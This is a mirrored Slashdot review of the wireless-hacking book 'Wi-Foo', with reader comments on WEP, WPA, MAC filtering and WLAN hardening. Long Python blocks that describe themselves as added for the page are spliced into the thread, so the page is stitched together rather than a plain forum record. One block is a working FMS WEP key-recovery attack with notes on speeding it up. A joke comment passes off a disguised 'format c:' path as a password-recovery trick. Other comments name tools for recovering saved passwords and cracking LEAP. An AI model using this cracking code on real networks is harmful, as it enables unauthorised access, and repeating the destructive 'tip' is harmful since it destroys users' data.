Slashdot Mirror


Wi-Foo: The Secrets of Wireless Hacking

prostoalex writes "Wireless LANs seem to be enjoying a tremendous amount of interest lately, if you judge by the number of book covers and articles written on the topic. It's no wonder that this year the sales of WLAN equipment will grow 20% and generate $2.1 billion; everyone seems to be installing a wireless network in their office, their apartment complex or their own backyard. By extending the network into the radio world, one is always extending the opportunities for unwelcome visitors to become part of the network. This book is a hands-on guide to hacking wireless networks, followed by the recipes and principles to protect WLANs." Read on for the rest of prostoalex's review of Wi-Foo.

Wi-Foo: The Secrets of Wireless Hacking
  author: Andrew Vladimirov, Konstantin V. Gavrilenko, Andrei A. Mikhailovsky
  pages: 608
  publisher: Addison-Wesley
  rating: 9
  reviewer: Alex Moskalyuk
  ISBN: 0321202171
  summary: Complete guide to wireless attack and defense

Wi-Foo requires a certain level of expertise, and it's unlikely that the book will be sold left and right or that everyone will want a copy. First of all, to do anything substantial you need to have a Linux or FreeBSD operating system installed and know your way around it. Second of all, some knowledge of Perl is required to go through the script source code and enjoy the occasional tools that appear on the Internet. The third required bit of knowledge is some familiarity with how wireless networks work and how one can take advantage of those radio waves that seem to contain pieces of data.

The authors claim that one has little knowledge of wireless security unless he's done some war-driving. So, skipping the first two chapters (which talk about security in general), chapters 3, 4 and 5 take the reader through the hassle of setting up a Linux laptop with all the hardware and software needed to do successful war-driving. The last time I reviewed a book on getting wireless to work with Linux, you guys kept asking what card would work best with a Linux laptop. To quote p. 28 of Wi-Foo, "if you're serious about 802.11 penetration testing, you should get a decent Prism chipset card. If you plan to base your security audit effort around the BSD platform, you probably cannot do without it. Prism chipset CF and PCMCIA cards are known to be produced by Addtron, Asante, Asus, Belkin, Buffalo, Compaq, Demark, D-Link, Linksys, Netgate, Netgear, Proxim, Senao, SMC, Teletronics, US Robotics, Zcomax and ZoomAir."

What follows could essentially be condensed into a single Web site with links to various Linux tools for network discovery, traffic analysis, encryption cracking, 802.1x cracking, frame generation and traffic injection. Kudos to the authors for providing sometimes detailed instructions on setting up the utility and getting the successful results out of it -- it's obvious that they did not just peruse the Web in search of what's available and provided a list of URLs; they installed, tested and reviewed all the Linux network security utilities listed in the table of contents. As much as many of the products and tools listed complement one another, it was useful for me to see the professionals' take on advantages and disadvantages of free tools out there. Wherever possible, the authors try to stick with free software, which makes the book a pretty useful guide for most enthusiasts out there.

The authors are serious about getting the reader to war-drive at some point, and chapter 8 specifically talks about generating wireless denial-of-service attacks as a last resort for a cracker who seems to be in a bad mood when other methods of wireless penetration do not work. The book talks about antenna amplifiers and some hardware you might buy to be more successful in wireless hacking. They also discuss the possibilities of war-biking, war-walking and riding a hot air balloon.

By the time you're finished with chapter 9, if your title includes words like "security" or "administrator," you will probably find yourself quite perplexed. That's where Part 3 (Defense) kicks in, as the authors discuss counter-measures against wireless cracking and possible steps one can take to secure the wireless network. It's not the typical don't-use-WEP, don't-broadcast-your-SSID, don't-rely-on-MAC-filtering preaching one can find in security manuals created for the home user (I am not saying those are bad; for a home user they do provide necessary guidance in securing a WLAN). This is mostly industrial-level security, which might include multiple levels of protection, such as 802.11i implementation, implementing encryption around the wireless networks, creating hardware Linux-based gateways, deploying VPNs and intrusion detection systems. Setting up honeypots is missing from this list, although one can debate whether this could be considered a worthwhile project outside of the academic world.

The book uses clear language and is easy to read. At the same time it takes a while to go through it, as you keep trying out the presented solutions on your Linux laptop. The chapters that talk about the philosophical decisions when securing wireless LANs are helpful as well; the authors occasionally get away from the hands-on approach and talk about general principles to consider. Code examples are easy to follow, and every tool that's presented in the title is accompanied by a URL (for some reason Addison-Wesley did not include a CD with Wi-Foo); a large number of them point to sourceforge.net. All the links are available on the book's Web site; see the attack and defense sections.

If you should decide to take up a career as a wireless security consultant, Appendix G includes a variety of checklists and templates that the authors recommend for the corporate environment. Chapter 8, "Breaking Through," is available for free in PDF format. Overall I liked this book a lot. It seemed to concentrate on what's necessary without going into fluff and chapters like "History of radio" or "Linux on laptops for beginners." It's informative and easy to read; if you're an enthusiast, try out the free chapter and see if you like the authors' style, but if you're a network admin or security professional, this book is almost a must. It's a combo of Exploiting Software and Hacking Exposed specializing in wireless LANs.

You can purchase Wi-Foo from bn.com.


  1. unwelcome visitors by dncsky1530 · · Score: 3, Interesting

    you can always not broadcast your wlan name and set a password, it works against most people. And on the other end you can always use KisMac or KisMet

    1. Re:unwelcome visitors by garcia · · Score: 5, Interesting

      Run everything over encrypted tunnels. Yeah it may be a performance hit but I'd rather not run the risk of an easy snoop.

      What we need is a book for router manufacturers that teaches them how to not enable default SSIDs and admin passwords for wireless networks. My neighbor would probably thank them.

    2. Re:unwelcome visitors by Anonymous Coward · · Score: 0

      how? what do you use?

    3. Re:unwelcome visitors by Anonymous Coward · · Score: 0

      Or you could just not have anything on your computer you wouldn't mind anyone seeing. If you don't want to explain it to a judge, don't have it!

    4. Re:unwelcome visitors by drinkypoo · · Score: 1

      Run everything over encrypted tunnels. Yeah it may be a performance hit but I'd rather not run the risk of an easy snoop.

      This is exactly what I do, I set up PPTP VPN with 128 bit encryption and forced encrypted passwords. I used PPTP so I could support Win98 clients, but I'm getting ready to get ipsec going too. I don't bother with WEP but I do use MAC whitelisting - sure you can spoof 'em but it will keep the casual lusers away.

      Also it doesn't have to be a performance hit but if it isn't it's going to be a wallet hit. You can get crypto accelerator cards and use them in assorted operating systems including Linux. Linux uses pluggable crypto stuff from the kernel so if you have a crypto card in theory it ought to be used automatically, provided you're using an appropriate cipher, but I really don't know for sure what I'm talking about because I don't have a spare fifty bucks to blow on a crypto card. Besides, a $50 processor upgrade (at least when specifying a new system) will probably do almost as much good and will help with other things.

      I would think that other free Unixes would do the same sort of thing, but I know even less about them :)

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
    5. Re:unwelcome visitors by Anonymous Coward · · Score: 0

      WTF? I don't mind explaining my credit card number to a judge. Yet I don't want to broadcast it in plaintext over the airwaves.

    6. Re:unwelcome visitors by Anonymous Coward · · Score: 0

      quiet you! i like my free internet exactly the way it is!

  2. That makes a good quote by Lord+Grey · · Score: 4, Funny
    Neo: "I know Wi-Foo."
    Morpheus: "Show me."
    --
    // Beyond Here Lie Dragons
    1. Re:That makes a good quote by Anonymous Coward · · Score: 5, Funny



      Boy: Do not try and hack the AP. That's impossible. Instead only try to realize the truth.

      Neo: What truth?

      Boy: There is no password.

      Neo: There is no password?

      Boy: Then you'll see that it is not the password thats exploitable, it is yourself.

    2. Re:That makes a good quote by Anonymous Coward · · Score: 1, Funny

      Actually, no, it doesn't.

    3. Re:That makes a good quote by shigelojoe · · Score: 5, Funny

      Neo: What are you trying to tell me? That I can dodge packet collisions?

      Morpheus: No, Neo. I'm trying to tell you that when you're ready, you won't have to.

      ...

      I think I just lost the Matrix quoting competition. :C

    4. Re:That makes a good quote by Crzysdrs · · Score: 0

      Morpheus: "The Wi-Fi is everywhere. It is all around us. Even now in this very room. You can see it when you look out your window. Or when you turn on your television. You can feel it when you go to work. When you go to Church. When you pay your taxes."

    5. Re:That makes a good quote by Anonymous Coward · · Score: 0

      Your Wi-Foo is not as strong as my Wi-Foo

  3. Greeeat by TaintedPastry · · Score: 4, Interesting
    Now the two who replied first can figure out how to bust into my home network, just what I need.

    Of the few exploit/hacking books I've read they seem more like "This is how much I (the author) know, that you don't" instead of informative, factual exchange of security-minded information.

    I may jump on this one, if not just to see if they laid the hubris on heavy this time...and, well, also because of the simple fact that the future is going to be completely wireless.

    1. Re:Greeeat by wakejagr · · Score: 1

      "I may jump on this one"
      Same here. It isn't too often that a Linux/*BSD book comes along that I will actually buy. Usually, anything F/OSS related can be found online, or in one of the bigass "sysadmin bible" type books I bought when I first got into Linux. However, wireless is one area that isn't too well covered in my bigass books, and it might be nice to have all this info in one place. I could probably find a lot of this online, but it's always good to have a starting point that doesn't require that my network is working. Makes even more sense if your network is wireless ;)

      --
      Don't save Windows XP! http://www.petitiononline.com/jjw1xp/petition.html
    2. Re:Greeeat by gl4ss · · Score: 1

      the future is going to have a lot of free radio frequencies?

      --
      world was created 5 seconds before this post as it is.
  4. Re:Bad Name by ryane67 · · Score: 0

    huh????

    --
    ?SYNTAX ERROR IN LINE 42
  5. home based wireless lan's by Stypen · · Score: 2, Insightful

    WEP.. simple, easy, mostly effective.

    --
    Opportunities of a lifetime must be seized within the lifetime of the opportunity. - Linda Ravenhill
    1. Re:home based wireless lan's by Anonymous Coward · · Score: 5, Funny

      *snort*

      More accurately...

      *AirSnort*

    2. Re:home based wireless lan's by storl · · Score: 4, Informative

      WEP by itself sometimes is not enough, especially if you transfer a lot of data through your wireless network in a heavily congested wireless area. Someone can sit outside and analyze the collisions and deduce your key (I believe that's how it works). If you combine high-level WEP with MAC protection and do not broadcast your ID, the vast majority of people will not be able to get onto your network. Luckily, these three things are relatively easy to do if you RTFM. Changing your key every now and then is a good idea too. Of course, there is always the slashdot crowd to prove me wrong...

    3. Re:home based wireless lan's by Anonymous Coward · · Score: 1, Interesting

      This is all enough :). Since the normal user only does some internet surfing and maybe editing a document and no real mass traffic via WLAN, this should be ok.

    4. Re:home based wireless lan's by Smallpond · · Score: 1

      WEP is so insecure it is being replaced by WPA + RADIUS. WPA can change 256-bit keys every 50 minutes to eliminate cracks by programs like Airsnort. RADIUS gives you central admin instead of having to change a key on every device manually. Cisco LEAP uses a separate one-time key for each session, which seems pretty secure.

    5. Re:home based wireless lan's by bugnuts · · Score: 4, Insightful

      The issue with WEP is that there are predictable packets where you can slowly derive information, and eventually obtain complete key recovery, and increasing the keylength only increases the difficulty LINEARLY, not exponentially.

      Normally when you add a single bit, it doubles the time for brute force attacks. Instead of being TWICE as difficult when going from 40 to 41 bits, it's only 1/40'th more difficult.

      You need to collect about 2GB of data to recover a 104 bit key, on the average.

      Now... that all said, it's arguable that if you even use a 40 bit key that you are proclaiming your network PRIVATE, where unauthorized use is actually a criminal offense. In other words, any use of it requires actually attacking the network, not just turning on your computer, which typically meets or surpasses any implied consent requirements. You will discourage anyone that wants to "ethically" borrow wireless by setting a WEP key.

      It's kind of like locking your screen door. It's easy to get past, but pretty obvious it's breaking and entering.

      If you're interested in providing an open network but with a "I won't break your network or the law" agreement, check out NoCat.

    6. Re:home based wireless lan's by bugnuts · · Score: 1

      Not true... internet surfing gives lots of data to analyze. And since the key will likely be the same forever, it should be easy to collect enough to analyze.

    7. Re:home based wireless lan's by Darth_brooks · · Score: 3, Interesting

      From Airsnort.shmoo.com: AirSnort requires approximately 5-10 million encrypted packets to be gathered.

      Wanna tell me how you're gonna grab 5 million packets (not counting SSID broadcasts) from a single network whilst wardriving? You need quite a few users going for a long time to generate that much traffic.

      Yes WPA is better, and it's nice to see it becoming a standard. But despite the FUD, WEP is not some disgustingly horribly insecure protocol that's gonna get hacked in 15 seconds by any script kiddie with a wifi card. It takes a *long-ass time* to gather the amount of data needed to crack WEP. There's far easier ways into a network. But then again, it's so much fun to play baby seal and arp away about WEP totally sucking ass.

      Try a capture on a home network and see how long it takes. My own net is four machines, including two always-on boxes. It still takes days to generate enough traffic to make an attempt at cracking WEP.

      For home (house) use, 128-bit WEP will work just fine. For office environments or apartment buildings, you should still crank things up a notch with MAC whitelisting etc.

      --
      There are some people that if they don't know, you can't tell 'em.
    8. Re:home based wireless lan's by bbdd · · Score: 2, Insightful

      i agree with the parent, and i found these comments to be very interesting. if you are up to date on firmware patches, wep might be enough for you.

      if you are trying to protect missile launch codes, i might look elsewhere, but for day-to-day crap...

    9. Re:home based wireless lan's by g_kos · · Score: 4, Informative

      You are not entirely correct, it is possible to inject traffic into a WEP-protected network. Besides, it is even possible to portscan the machines on WEP-protected networks, e.g. http://sourceforge.net/projects/wepwedgie/

    10. Re:home based wireless lan's by g_kos · · Score: 2, Informative

      Joshua has released a tool to "recover" leap passwords a year ago...

      http://asleap.sourceforge.net/

    11. Re:home based wireless lan's by AK+Marc · · Score: 4, Insightful

      WEP by itself sometimes is not enough,

      Sure it is. Unless you have specific enemies, or you are next door to someone that has nothing better to do than try to illegally break into your network (not too bright to commit a federal felony just to save a little on the cable modem bill), then WEP is more than enough. Sure, it isn't unbreakable. But it will get anyone mobile looking to get free access or check out someone's computers to move down the block to the unencrypted one.

      Your security doesn't have to be foolproof. It just has to be good enough so that the people looking to break in move to the next target.

      with MAC protection

      Uh, speaking of poor security, it takes all of one captured packet to defeat this. Find the MAC of a card that is on the network (in the headers, easy to get), and manually set your card to that MAC. You'll run into fewer problems if you don't try to get on at the same time they are on, though. Again, that will only keep out the stupid and uncommitted, and can be cracked with inspection of a single packet. For something so utterly useless compared to even the flawed WEP, I'm surprised it even made your list. I don't know of a single person capable of cracking WEP that wouldn't get through your MAC filter in less than 30 seconds (and that's people capable of breaking WEP, not just people who say they've seen some tool available somewhere that may capture packets or something).

      Oh, and even if you don't broadcast your SSID, it is included in the packets. There are tools that will scan more than just the beacon packets and will be able to pull the SSID out. Again, someone that knows what they are doing will be much more inconvenienced by WEP than all the other things you mentioned combined. Sure, it improves security. It's like locking the door handle when you have already locked the deadbolt. If someone can defeat a deadbolt, they can easily defeat the handle lock as well.

      Of course, there is always the slashdot crowd to prove me wrong...

      Not prove you wrong. You are right. It is harder to break into a network that also has MAC filtering enabled and SSID broadcasts disabled. But, even as easy as it is to set up, even easier to break those than it was to set them up (assuming that someone capable of cracking WEP is moderately familiar with the concepts). So, though correct, I'd put it in the FUD category.

    12. Re:home based wireless lan's by Anonymous Coward · · Score: 0

      Except that not everybody using lame-ass airsnort. Hang around netstumbler.org and weep... WEP is really shit.

    13. Re:home based wireless lan's by Anonymous Coward · · Score: 0

      My lecturer tells me there are two different levels of security: Real security and kid sister security. When you say "the vast majority of people will not be able to get onto your network" you are referring to the latter. That is, your kid sister can't crack the code but that's about it.

      If you want more security than that - don't rely on WEP.

    14. Re:home based wireless lan's by Matje · · Score: 1

      Just for my understanding: wouldn't bypassing a MAC filter or eavesdropping on the SSID be illegal as well? If bypassing WEP is illegal, this stuff is too right?

    15. Re:home based wireless lan's by Anonymous Coward · · Score: 0

      AirSnort relies on the now three year old "standard" FMS attack, and is sub-optimal. On the other hand, the very latest release of aircrack with the korek patch introduces a whole new set of attacks, making it possible to crack a 104-bit WEP key with as few as half a million encrypted packets (the probability of success is about 90%). With the help of WEP-encrypted ARP-request re-injection, you can gather enough packets in less than an hour.

      For more information, see this thread about aircrack
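The statistical attack that bugnuts describes above (predictable first plaintext byte, key bytes recovered one at a time, work linear in the key length) and that AirSnort implements is the Fluhrer-Mantin-Shamir weak-IV attack. The following Python is an added example written for this page; it is not code from the book, from AirSnort or aircrack, or from any poster. It assumes a constructed 40-bit key, a constructed capture that contains only the classic (A+3, 255, X) weak IVs, and that the first plaintext byte of every data frame is the LLC/SNAP DSAP value 0xAA (which is what makes the first keystream byte known):

```python
from collections import Counter

SNAP_FIRST_BYTE = 0xAA  # LLC/SNAP DSAP: first plaintext byte of every 802.11 data frame


def rc4_ksa(key):
    """RC4 key scheduling; returns the 256-entry permutation S."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S


def rc4_first_byte(key):
    """First keystream byte (one PRGA step after the full KSA)."""
    S = rc4_ksa(key)
    i, j = 1, S[1]
    S[i], S[j] = S[j], S[i]
    return S[(S[i] + S[j]) & 0xFF]


def wep_xor_first_byte(iv, secret, byte):
    """WEP seeds RC4 with IV || secret key; the 3-byte IV travels in the clear."""
    return rc4_first_byte(bytes(iv) + bytes(secret)) ^ byte


def ksa_partial(known_key, steps):
    """The first `steps` KSA rounds depend only on the first `steps` key bytes."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + known_key[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def fms_vote(iv, keystream_byte, recovered):
    """Fluhrer-Mantin-Shamir: with the IV and the key bytes recovered so far, run
    B = 3 + len(recovered) KSA rounds. If the state is 'resolved', the first keystream
    byte equals S[B] after round B with probability ~5%, which pins key byte B.
    Returns a vote for key byte B, or None when this IV carries no information."""
    B = 3 + len(recovered)
    S, j = ksa_partial(bytes(iv) + bytes(recovered), B)
    if S[1] >= B or (S[1] + S[S[1]]) & 0xFF != B:
        return None
    return (S.index(keystream_byte) - j - S[B]) & 0xFF


def verify_key(secret, packets, count=8):
    """Candidate check: decrypting the first byte of `count` frames must give 0xAA every time."""
    return all(wep_xor_first_byte(iv, secret, c0) == SNAP_FIRST_BYTE
               for iv, c0 in packets[:count])


def recover_key(packets, key_len, branch=3):
    """Recover the key one byte at a time (work grows linearly with key length).
    If the top vote fails verification, back up and try the runners-up."""
    def search(recovered):
        if len(recovered) == key_len:
            key = bytes(recovered)
            return key if verify_key(key, packets) else None
        votes = Counter()
        for iv, c0 in packets:
            guess = fms_vote(iv, c0 ^ SNAP_FIRST_BYTE, recovered)  # c0 ^ 0xAA = keystream byte
            if guess is not None:
                votes[guess] += 1
        for candidate, _ in votes.most_common(branch):
            found = search(recovered + [candidate])
            if found is not None:
                return found
        return None
    return search([])


def make_capture(secret):
    """Constructed capture: (iv, first ciphertext byte) for the 256 classic weak IVs
    (A+3, 255, X) of every key byte A. A real capture has these buried among millions of frames."""
    packets = []
    for A in range(len(secret)):
        for X in range(256):
            iv = (A + 3, 255, X)
            packets.append((iv, wep_xor_first_byte(iv, secret, SNAP_FIRST_BYTE)))
    return packets


if __name__ == "__main__":
    SECRET = bytes.fromhex("1f2bc37705")  # constructed 40-bit key; the attacker never sees it
    print(recover_key(make_capture(SECRET), len(SECRET)).hex())
```

Each resolved IV votes for the right byte only about one time in twenty, so a few hundred weak IVs are needed per key byte, and since weak IVs are a small slice of the 2^24 IV space that is where the "millions of packets" figure comes from unless the attacker injects traffic to make the access point burn through IVs faster. Adding a bit to the key adds one more byte-sized vote, not a doubling, which is the linear growth bugnuts points out. Firmware with weak-IV avoidance simply never emits this (A+3, 255, X) family, which defeats this particular example; the KoreK attacks in aircrack do not depend on that family, which is why they work against patched firmware.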

    16. Re:home based wireless lan's by Anonymous Coward · · Score: 0

      Exactly... and knowing what sites they are browsing (who doesn't load www.google.com from time to time?) you have plenty of predictable data to help you break the crypto.

    17. Re:home based wireless lan's by AK+Marc · · Score: 1

      Eavesdropping on the SSID would not be illegal. It is being broadcast. You have to take no special steps to read or understand it. Just because they turn off the packets with no other real purpose than to broadcast the SSID does not mean that the SSID is not continuing to be broadcast.

      As for whether bypassing MAC security is illegal, that is for the courts to decide (and they will probably do so poorly, as they do with most technical issues). The SSID is an invitation to join a network. Pulling a MAC is not pulling an invitation, so it is different, but it is still taking unencrypted broadcasts being publicly transmitted and entering the information in your computer. By spirit, it should be illegal, but I don't think it has ever been officially decided.

  6. Not just wireless by caluml · · Score: 4, Informative

    As well as being experts in the Wireless field, they also run a very good InfoSec company. www.arhont.com. Highly recommended if you want the view that the black hats would have of your networks.

  7. Hmmmm...Packets by radiumhahn · · Score: 2, Funny

    My wireless router's breath smells like packets.

    1. Re:Hmmmm...Packets by radiumhahn · · Score: 2, Funny

      Ralph Wiggum, Network Admin.

  8. One word... by mi · · Score: 1
    IPSEC

    Windows, BSD, Linux -- whatever...

    --
    In Soviet Washington the swamp drains you.
    1. Re:One word... by Artega+VH · · Score: 1

      Why add that extra layer for most home users? I find its an absolute pain at university and couldn't imagine using it at home...

      A combination of WAP/WEP, MAC address allow lists and not broadcasting the network name will keep pretty much everyone out. Why would someone bother breaking in when there are several open wireless networks on every street. (at least in my suburb)

      --
      groklaw, wired and slashdot. The holy trinity of work based time wasting.
    2. Re:One word... by Fuzzums · · Score: 1

      For what I know, IPSEC doesn't stop me from (ab)using your wi-fi internet connection.

      --
      Privacy is terrorism.
    3. Re:One word... by Anonymous Coward · · Score: 0

      Not if you allow non-IPSEC connections, still.
      But why would you do that?

    4. Re:One word... by Anonymous Coward · · Score: 0

      because yours might the most interesting/challenging given those facts?

    5. Re:One word... by Anonymous Coward · · Score: 0

      Well, more of an acronym, really.

    6. Re:One word... by mi · · Score: 1
      For what I know, IPSEC doesn't stop me from (ab)using your wi-fi internet connection.

      You don't know enough -- it does. My NAT-ing gateway will not talk to you, nor will anything else on my network. You will not be able to read what my network talks about, nor will you be able to use the Internet through my uplink.

      --
      In Soviet Washington the swamp drains you.
  9. Slow internet... by livhan28 · · Score: 4, Funny

    And my neighbor will never know...why his internet got so much slower the day i came home from college...

    1. Re:Slow internet... by Anonymous Coward · · Score: 0

      No kidding, when I bought the card+router bundle at local BestBuy, I was thinking of returning the router when I did a search of available wireless networks and discovered three of them named linksys .

  10. Re:Bad Name by outsider007 · · Score: 4, Interesting

    Kung Fu is a martial art skill.
    Kung Foo is programming skill.
    Therefore Wifi Foo is skill at hacking/securing wifi networks.
    You overthought this one.

    --
    If you mod me down the terrorists will have won
  11. Re:Cracking a pswd by Anonymous Coward · · Score: 0

    Check astalavista or download.com, there's a bunch of password utilites for Windows allowing you to decode those asterisks.

  12. Re:Cracking a pswd by Anonymous Coward · · Score: 0

    Iopus Password Recovery should do the trick.

  13. Re:Cracking a pswd by Anonymous Coward · · Score: 3, Funny
    If you have physical access to a Win XP machine that is on the wireless network how can you obtain the WEP pswd
    Type 'network'. If that doesn't work, open a browser window and type file:///c:/windows/system32/format%20c:/
    Man, you guys Rock! W00t!!! I'm gonna try this right n
  14. WPA-PSK? by Proc6 · · Score: 3, Informative

    With a really decently long key? I've not heard of any compromises of WPA-PSK yet. WEP yes, WPA no.

    --

    I'm Rick James with mod points biatch!

    1. Re:WPA-PSK? by Anonymous Coward · · Score: 0

      You'll need at least a 20-character key for WPAv1-PSK. Who would remember that without writing it down and sticking it on a monitor ? :)

  15. Gnoppix sucks at display. by Anonymous Coward · · Score: 0

    That is all.

  16. Missing anything? by NEOtaku17 · · Score: 3, Interesting

    Steps to securing my WLAN:


    1.Change default router login password
    2.Enabled firewall
    3.Mac address filtering
    4.AES encryption with non-dictionary 15 character passphrase
    5.Disabled SSID broadcast
    6.Updated to latest firmware
    7.Disabled remote router login
    8.Enabled 802.11g only
    9.Updated to latest wireless network card drivers

    Am I missing anything really obvious?


    1. Re:Missing anything? by redwoodtree · · Score: 4, Informative

      Yes, a few things:

      * Change the Key monthly or otherwise periodically.
      * Even with all this, run encrypted protocols as much as possible SSH, SSL, etc. No clear text protocols
      * Run a monitor on your access point to monitor against your MAC Address filtering list, send a trap when an unknown Mac address connects. By definition if you have a Mac address allow list you should be able to do this easily.
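What redwoodtree's third point looks like in code, as an added Python example that is neither from the book nor from any poster: it audits association events against the MAC allow-list and, because AK+Marc's point above is that a filter is bypassed by cloning an allowed MAC, it also flags an allowed station that associates again while its earlier session is still up. The log lines are constructed and the hostapd-style format (`iface: STA mac IEEE 802.11: associated`) is an assumption; adapt the regex to whatever your access point actually logs.

```python
import re

# Station allow-list, as configured on the access point (constructed for this example).
ALLOWED = {"00:0c:29:4a:1b:2c", "00:40:96:a1:b2:c3"}

# Constructed log excerpt in a hostapd-like format (format is an assumption).
SAMPLE_LOG = """\
wlan0: STA 00:0c:29:4a:1b:2c IEEE 802.11: associated
wlan0: STA 00:40:96:a1:b2:c3 IEEE 802.11: associated
wlan0: STA 00:0c:29:4a:1b:2c IEEE 802.11: disassociated
wlan0: STA 00:11:22:33:44:55 IEEE 802.11: associated
wlan0: STA 00:40:96:a1:b2:c3 IEEE 802.11: associated
"""

LINE_RE = re.compile(
    r"^(?P<iface>\S+): STA (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2}) "
    r"IEEE 802\.11: (?P<event>associated|disassociated)$",
    re.IGNORECASE,
)


def parse_line(line):
    """Return (iface, mac, event) for an association/disassociation line, else None."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    return m["iface"], m["mac"].lower(), m["event"].lower()


def audit(lines, allowed):
    """Walk the log in order and return a list of (mac, reason) alerts.

    Two conditions are flagged: a MAC that is not on the allow-list, and an allowed
    MAC that associates a second time with no disassociation in between, which is
    what a cloned MAC looks like when the real owner is still on the air."""
    allowed = {m.lower() for m in allowed}
    associated = set()
    alerts = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue  # unrelated log line
        _iface, mac, event = parsed
        if event == "associated":
            if mac not in allowed:
                alerts.append((mac, "unknown MAC associated"))
            elif mac in associated:
                alerts.append((mac, "duplicate association without disassociation (possible MAC spoofing)"))
            associated.add(mac)
        else:
            associated.discard(mac)
    return alerts


if __name__ == "__main__":
    for mac, reason in audit(SAMPLE_LOG.splitlines(), ALLOWED):
        print(f"ALERT {mac}: {reason}")
```

Sending the SNMP trap or syslog message is left to whatever `audit` is wired into. The duplicate-association heuristic is a hint, not proof: clients reassociate after roaming or waking from power save without always logging a disassociation first, so tune it on your own traffic before paging anyone on it. It also cannot see a spoofer who waits until the real station has left, which is exactly the timing AK+Marc recommends.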

    2. Re:Missing anything? by bugnuts · · Score: 0, Offtopic

      Am I missing anything really obvious?

      ???
      Profit!

    3. Re:Missing anything? by j1m+5n0w · · Score: 2, Funny
      Am I missing anything really obvious?

      10. A tin-foil hat?

      -jim

    4. Re:Missing anything? by g_kos · · Score: 1

      1. Change default router login password - wise thing to do, but will not help if your windoze box is accessible through the wireless.
      2. Enabled firewall - you forgot to mention that it has to be properly configured :)
      3. Mac address filtering - takes seconds to bypass, by sniffing the air.
      4. AES encryption with non-dictionary 15 character passphrase - are we talking about 802.11i ???
      5. Disabled SSID broadcast - NOT TRUE. the SSID is sniffable in the air
      6. Updated to latest firmware & 9. Updated to latest wireless network card drivers - what difference does it make if the flaw is in the standard itself.
      7. Disabled remote router login - well, not always works on every router, might still be configurable through SNMP, what stops from owning your windoze through wireless and finally strict source routing might help.

      apart from the above, it is a good attempt ;)

    5. Re:Missing anything? by ambit · · Score: 1

      Disable the router from serving DHCP.
      Assign yourself static addresses.

    6. Re:Missing anything? by mikewas · · Score: 1

      256 bit WEP? Only a couple of manufacturers support it.

      --

      "Glory is fleeting, but obscurity is forever." --Napoleon Bonaparte
    7. Re:Missing anything? by Anonymous Coward · · Score: 2, Interesting

      I did not use a passphrase to generate my WEP key. Instead I generated it as a hexadecimal string using a d20 (20 sided die found at hobbyist stores, used in the D&D family of role playing games). Each hexadecimal digit may be generated as follows:

      20 = 0
      1-9 = face value
      10 = A
      11 = B
      12 = C
      13 = D
      14 = E
      15 = F
      16-19 = re-roll

      The advantage of this method is it produces a key that is immune to a dictionary attack as it is highly unlikely that any pass phrase corresponds to it. Every bit has an equal chance of being set or unset.

      Note -- do NOT roll a standard 6 sided die 3 times and add the result subtracting three. Although this does produce digits from 0-15, there is not an equal distribution. A 7 is far more likely than the combined odds of a 0 or F.
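The dice table above as code, plus the exact distribution behind the 3d6 warning. This is an added Python example for this page, not the poster's own procedure or anything from the book; the `wep_key_hex` helper that swaps the physical die for `secrets.randbelow` is an addition of mine, and the 6-digit key in the demo is constructed.

```python
import secrets
from collections import Counter
from fractions import Fraction


def d20_to_hex_digit(roll):
    """One d20 roll -> hex digit 0..15 per the table above; None means re-roll (16-19)."""
    if not 1 <= roll <= 20:
        raise ValueError("d20 rolls are 1..20")
    if roll == 20:
        return 0
    if roll <= 15:
        return roll          # 1-9 face value, 10-15 -> A-F
    return None              # 16-19 are rejected, which is what keeps the digits uniform


def hex_key_from_rolls(rolls, ndigits):
    """Rejection sampling: consume rolls, skip rejected ones, stop after ndigits digits."""
    digits = []
    for roll in rolls:
        d = d20_to_hex_digit(roll)
        if d is None:
            continue
        digits.append(f"{d:x}")
        if len(digits) == ndigits:
            return "".join(digits)
    raise ValueError("ran out of rolls")


def wep_key_hex(bits, roll=lambda: secrets.randbelow(20) + 1):
    """Software version of the dice method: a CSPRNG 'd20' fed through the same table.
    40-bit WEP needs 10 hex digits, 104-bit WEP needs 26."""
    if bits % 4:
        raise ValueError("key length must be a multiple of 4 bits")
    return hex_key_from_rolls(iter(roll, None), bits // 4)


def d20_digit_distribution():
    """Probability of each hex digit, conditioned on the roll being accepted."""
    accepted = [d for d in map(d20_to_hex_digit, range(1, 21)) if d is not None]
    return {d: Fraction(1, len(accepted)) for d in accepted}


def three_d6_minus_three_distribution():
    """Exact distribution of 3d6 - 3 (0..15): the scheme the post warns against."""
    counts = Counter(a + b + c - 3
                     for a in range(1, 7) for b in range(1, 7) for c in range(1, 7))
    return {v: Fraction(n, 216) for v, n in sorted(counts.items())}


if __name__ == "__main__":
    print(hex_key_from_rolls(iter([20, 1, 9, 10, 15, 16, 19, 11]), 6))  # constructed rolls
    print(wep_key_hex(104))
    biased = three_d6_minus_three_distribution()
    print(f"P(7) = {biased[7]}, P(0) + P(F) = {biased[0] + biased[15]}")
```

`d20_digit_distribution` returns 1/16 for every digit, while the 3d6-3 table puts 27/216 on 7 against 1/216 each on 0 and F, so the post's caution is right: summing dice concentrates the key around the middle values and an attacker enumerating likely keys first gets a real shortcut. Rejection sampling costs you a re-roll one time in five and costs the attacker nothing, which is the right trade.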

    8. Re:Missing anything? by MsGeek · · Score: 1

      Also keep your WAP on a separate "real world" IP from the rest of your system. Thanks to DSL Extreme, I now have the ability to completely separate the wireless traffic from the wired traffic. If someone gets around these obstacles:

      * SSID broadcast OFF
      * DHCP OFF and static address in a non-obvious non-routable range (not 192.168.0.x, 192.168.1.x, 192.168.2.x or 192.168.254.x. Most routers default to these ranges and so does Windows Internet Connection Sharing)
      * MAC address whitelisting
      * WEP key

      all they'll get is the ability to piggyback on my connection. That's it. They will be on a different subnet to anything I care about. Knock yourself out, l33t b0i.

      (Note: this can be accomplished with some fancy routing and non-routing on a firewall box with two nics and a WAP. But this way is easier. And yes, I know that nothing is uncrackable.)

      --
      Knowledge is power. Knowledge shared is power multiplied.
    9. Re:Missing anything? by syukton · · Score: 1

      There are ways of changing a device's MAC address, aren't there?

